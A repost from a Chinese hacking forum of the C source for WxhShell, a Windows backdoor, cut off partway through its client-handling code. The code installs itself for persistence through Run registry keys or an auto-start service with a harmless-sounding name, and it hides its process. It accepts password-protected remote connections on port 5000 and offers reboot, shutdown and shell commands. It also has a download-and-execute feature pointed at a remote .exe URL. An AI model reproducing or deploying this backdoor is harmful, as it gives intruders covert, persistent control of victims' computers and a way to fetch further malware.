标题: [转帖]带有端口重定向的后门WxhShell源代码 [打印本页]

---

作者: 坏的刚刚好    时间: 2006-9-22 00:06     标题: [转帖]带有端口重定向的后门WxhShell源代码

1. #include "stdafx.h"
2. &#35;include <stdio.h>
3. &#35;include <string.h>
4. &#35;include <windows.h>
5. &#35;include <winsock2.h>
6. &#35;include <winsvc.h>
7. &#35;include <urlmon.h>
8. &#35;pragma comment (lib, "Ws2_32.lib")
9. &#35;pragma comment (lib, "urlmon.lib")
10. &#35;define MAX_USER 100 // 最大客户端连接数
11. &#35;define BUF_SOCK 200 // sock buffer
12. &#35;define KEY_BUFF 255 // 输入 buffer
13. &#35;define REBOOT 0 // 重启
14. &#35;define SHUTDOWN 1 // 关机
16. &#35;define DEF_PORT 5000 // 监听端口
17. &#35;define REG_LEN 16 // 注册表键长度
18. &#35;define SVC_LEN 80 // NT服务名长度
19. // 从dll定义API
20. typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
21. typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
22. typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
23. typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);
24. // wxhshell配置信息
25. struct WSCFG {
26. int ws_port; // 监听端口
27. char ws_passstr[REG_LEN]; // 口令
28. int ws_autoins; // 安装标记, 1=yes 0=no
29. char ws_regname[REG_LEN]; // 注册表键名
30. char ws_svcname[REG_LEN]; // 服务名
31. char ws_svcdisp[SVC_LEN]; // 服务显示名
32. char ws_svcdesc[SVC_LEN]; // 服务描述信息
33. char ws_passmsg[SVC_LEN]; // 密码输入提示信息
34. int ws_downexe; // 下载执行标记, 1=yes 0=no
35. char ws_fileurl[SVC_LEN]; // 下载文件的 url, "http://xxx/file.exe"
36. char ws_filenam[SVC_LEN]; // 下载后保存的文件名
37. };
38. // default Wxhshell configuration
39. struct WSCFG wscfg={DEF_PORT,
40. "xuhuanlingzhe",
41. 1,
42. "Wxhshell",
43. "Wxhshell",
44. "WxhShell Service",
45. "Wrsky Windows CmdShell Service",
46. "Please Input Your Password: ",
47. 1,
48. "http://www.wrsky.com/wxhshell.exe",
49. "Wxhshell.exe"
50. };
51. // 消息定义模块
52. char *msg_ws_copyright="\n\rWxhShell v1.0 &copy;2005 [url=http://www.wrsky.com\n\rMake]http://www.wrsky.com\n\rMake[/url] by 虚幻灵者\n\r";
53. char *msg_ws_prompt="\n\r? for help\n\r&#35;>";
54. char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r&#35;>http://.../server.exe\n\r";
55. char *msg_ws_ext="\n\rExit.";
56. char *msg_ws_end="\n\rQuit.";
57. char *msg_ws_boot="\n\rReboot...";
58. char *msg_ws_poff="\n\rShutdown...";
59. char *msg_ws_down="\n\rSave to ";
60. char *msg_ws_err="\n\rErr!";
61. char *msg_ws_ok="\n\rOK!";
62. char ExeFile[MAX_PATH];
63. int nUser = 0;
64. HANDLE handles[MAX_USER];
65. int OsIsNt;
66. SERVICE_STATUS serviceStatus;
67. SERVICE_STATUS_HANDLE hServiceStatusHandle;
68. // 函数声明
69. int Install(void);
70. int Uninstall(void);
71. int DownloadFile(char *sURL, SOCKET wsh);
72. int Boot(int flag);
73. void HideProc(void);
74. int GetOsVer(void);
75. int Wxhshell(SOCKET wsl);
76. void TalkWithClient(void *cs);
77. int CmdShell(SOCKET sock);
78. int StartFromService(void);
79. int StartWxhshell(LPSTR lpCmdLine);
80. VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
81. VOID WINAPI NTServiceHandler( DWORD fdwControl );
82. // 数据结构和表定义
83. SERVICE_TABLE_ENTRY DispatchTable[] =
84. {
85. {wscfg.ws_svcname, NTServiceMain},
86. {NULL, NULL}
87. };
88. // 自我安装
89. int Install(void)
90. {
91. char svExeFile[MAX_PATH];
92. HKEY key;
93. strcpy(svExeFile,ExeFile);
94. // 如果是win9x系统，修改注册表设为自启动
95. if(!OsIsNt) {
96. if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
97. RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
98. RegCloseKey(key);
99. if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
100. RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
101. RegCloseKey(key);
102. return 0;
103. }
104. }
105. }
106. else {
107. // 如果是NT以上系统，安装为系统服务
108. SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
109. if (schSCManager!=0)
110. {
111. SC_HANDLE schService = CreateService
112. (
113. schSCManager,
114. wscfg.ws_svcname,
115. wscfg.ws_svcdisp,
116. SERVICE_ALL_ACCESS,
117. SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
118. SERVICE_AUTO_START,
119. SERVICE_ERROR_NORMAL,
120. svExeFile,
121. NULL,
122. NULL,
123. NULL,
124. NULL,
125. NULL
126. );
127. if (schService!=0)
128. {
129. CloseServiceHandle(schService);
130. CloseServiceHandle(schSCManager);
131. strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
132. strcat(svExeFile,wscfg.ws_svcname);
133. if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
134. RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
135. RegCloseKey(key);
136. return 0;
137. }
138. }
139. CloseServiceHandle(schSCManager);
140. }
141. }
142. return 1;
143. }
144. // 自我卸载
145. int Uninstall(void)
146. {
147. HKEY key;
148. if(!OsIsNt) {
149. if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
150. RegDeleteV&#97;lue(key,wscfg.ws_regname);
151. RegCloseKey(key);
152. if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
153. RegDeleteV&#97;lue(key,wscfg.ws_regname);
154. RegCloseKey(key);
155. return 0;
156. }
157. }
158. }
159. else {
160. SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
161. if (schSCManager!=0)
162. {
163. SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
164. if (schService!=0)
165. {
166. if(DeleteService(schService)!=0) {
167. CloseServiceHandle(schService);
168. CloseServiceHandle(schSCManager);
169. return 0;
170. }
171. CloseServiceHandle(schService);
172. }
173. CloseServiceHandle(schSCManager);
174. }
175. }
176. return 1;
177. }
178. // 从指定url下载文件
179. int DownloadFile(char *sURL, SOCKET wsh)
180. {
181. HRESULT hr;
182. char seps[]= "/";
183. char *token;
184. char *file;
185. char myURL[MAX_PATH];
186. char myFILE[MAX_PATH];
187. strcpy(myURL,sURL);
188. token=strtok(myURL,seps);
189. while(token!=NULL)
190. {
191. file=token;
192. token=strtok(NULL,seps);
193. }
194. GetCurrentDirectory(MAX_PATH,myFILE);
195. strcat(myFILE, "\\");
196. strcat(myFILE, file);
197. send(wsh,myFILE,strlen(myFILE),0);
198. send(wsh,"...",3,0);
199. hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
200. if(hr==S_OK)
201. return 0;
202. else
203. return 1;
204. }
205. // 系统电源模块
206. int Boot(int flag)
207. {
208. HANDLE hToken;
209. TOKEN_PRIVILEGES tkp;
210. if(OsIsNt) {
211. OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
212. LookupPrivilegeV&#97;lue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
213. tkp.PrivilegeCount = 1;
214. tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
215. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
216. if(flag==REBOOT) {
217. if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
218. return 0;
219. }
220. else {
221. if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
222. return 0;
223. }
224. }
225. else {
226. if(flag==REBOOT) {
227. if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
228. return 0;
229. }
230. else {
231. if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0))
232. return 0;
233. }
234. }
235. return 1;
236. }
237. // win9x进程隐藏模块
238. void HideProc(void)
239. {
240. HINSTANCE hKernel=LoadLibrary("Kernel32.dll");
241. if ( hKernel != NULL )
242. {
243. pREGISTERSERVICEPROCESS *pRegisterServiceProcess=(pREGISTERSERVICEPROCESS *)GetProcAddress(hKernel,"RegisterServiceProcess");
244. ( *pRegisterServiceProcess)(GetCurrentProcessId(),1);
245. FreeLibrary(hKernel);
246. }
247. return;
248. }
249. // 获取操作系统版本
250. int GetOsVer(void)
251. {
252. OSVERSIONINFO winfo;
253. winfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
254. GetVersionEx(&winfo);
255. if(winfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
256. return 1;
257. else
258. return 0;
259. }
260. // 客户端句柄模块
261. int Wxhshell(SOCKET wsl)
262. {
263. SOCKET wsh;
264. struct sockaddr_in client;
265. DWORD myID;
266. while(nUser<MAX_USER)
267. {
268. int nSize=sizeof(client);
269. wsh=accept(wsl,(struct sockaddr *)&client,&nSize);
270. if(wsh==INVALID_SOCKET) return 1;
271. handles[nUser]=CreateThread(0,1000,(LPTHREAD_START_ROUTINE) TalkWithClient,(VOID *) wsh, 0, &myID);
272. if(handles[nUser]==0)
273. closesocket(wsh);
274. else
275. nUser++;
276. }
277. WaitForMultipleObjects(MAX_USER,handles,TRUE,INFINITE);
278. return 0;
279. }
280. // 关闭 socket
281. void CloseIt(SOCKET wsh)
282. {
283. closesocket(wsh);
284. nUser--;
285. ExitThread(0);
286. }
287. // 客户端请求句柄
288. void TalkWithClient(void *cs)
289. {
290. SOCKET wsh=(SOCKET)cs;
291. char pwd[SVC_LEN];
292. char cmd[KEY_BUFF];
293. char chr[1];
294. int i,j;
295. while (nUser < MAX_USER) {
296. if(wscfg.ws_passstr) {
297. if(strlen(wscfg.ws_passmsg)) send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
298. //send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
299. //ZeroMemory(pwd,KEY_BUFF);
300. i=0;
301. while(i<SVC_LEN) {
302. // 设置超时
303. fd_set FdRead;
304. struct timev&#97;l TimeOut;
305. FD_ZERO(&FdRead);
306. FD_SET(wsh,&FdRead);
307. TimeOut.tv_sec=8;
308. TimeOut.tv_usec=0;
309. int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut);
310. if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh);
311. if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
312. pwd[i]=chr[0];
313. if(chr[0]==0xd || chr[0]==0xa) {
314. pwd[i]=0;
315. break;
316. }
317. i++;
318. }
319. // 如果是非法用户，关闭 socket
320. if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh);
321. }
322. send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0);
323. send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);
324. while(1) {
325. ZeroMemory(cmd,KEY_BUFF);
326. // 自动支持客户端 telnet标准
327. j=0;
328. while(j<KEY_BUFF) {
329. if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
330. cmd[j]=chr[0];
331. if(chr[0]==0xa || chr[0]==0xd) {
332. &nb

复制代码

---

欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)

Powered by Discuz! 7.2